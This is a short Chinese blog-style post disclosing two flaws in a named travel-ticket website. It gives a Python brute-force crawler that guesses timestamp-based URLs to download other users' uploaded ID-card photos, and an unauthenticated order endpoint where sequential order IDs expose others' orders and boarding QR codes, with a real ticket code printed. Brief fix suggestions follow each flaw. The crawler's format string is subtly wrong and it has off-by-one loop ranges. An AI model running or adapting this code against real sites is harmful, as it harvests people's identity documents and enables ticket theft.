在今晚抢这个免费票的时候,发现这网站(http://www.guilinchuxingwang.com)注册还要上传身份证- -为了保证信息安全,就顺手看了看 =。=没想到还挺有意思的。
1.身份证图片上传地址猜测漏洞
图片的地址格式类似于
http://image.db.guilinchuxingwang.com/四位年份/不补零月份/不补零日子/PIC{两位数年份}{两位数月份,补零}{两位数日子,补零}{两位小时,补零}{两位分钟,补零}{两位秒,补零}{三位毫秒,补零}.jpg
写个小爬虫,就可以爬取了。
import requests
year = 2017
month = 7
day = 18
for hour in range(0, 23):
for minute in range(0, 59):
for second in range(0, 59):
for millsecond in range(0, 999):
url = "http://image.db.guilinchuxingwang.com/" +str(year)+ "/" +str(month)+ "/" +str(day)+ "/PIC{:0>2d}{:0>2d}{:0>2d}{:0>2d}{:0>2d}{:0>2d}{:0>3d}.jpg\n".format(year%2000, hour, day, hour, minute, second, millsecond)
r = requests.get(url)
if(r.status_code == 200):
print(url + "\n")
修复方法:不要将图片放在直接可以访问的地址,用程序来读取图片然后展示,加好权鉴。要不这样做的话,最起码文件名得随机吧。
2.订单任意读取漏洞
这个地址
http://pc.db.guilinchuxingwang.com/user/logined/tour/getMyOrderInfo?orderId={订单号}
从1开始的订单号,比如
我输入一个550,就可以看到别人的订单了。
拿到主车票编码后,就可以拿到上车的二维码了。
http://api.db.gldingyao.com/user/tour/toVerifyTicket?code=TO1707190647249429
修复方法:对订单读取加强权鉴。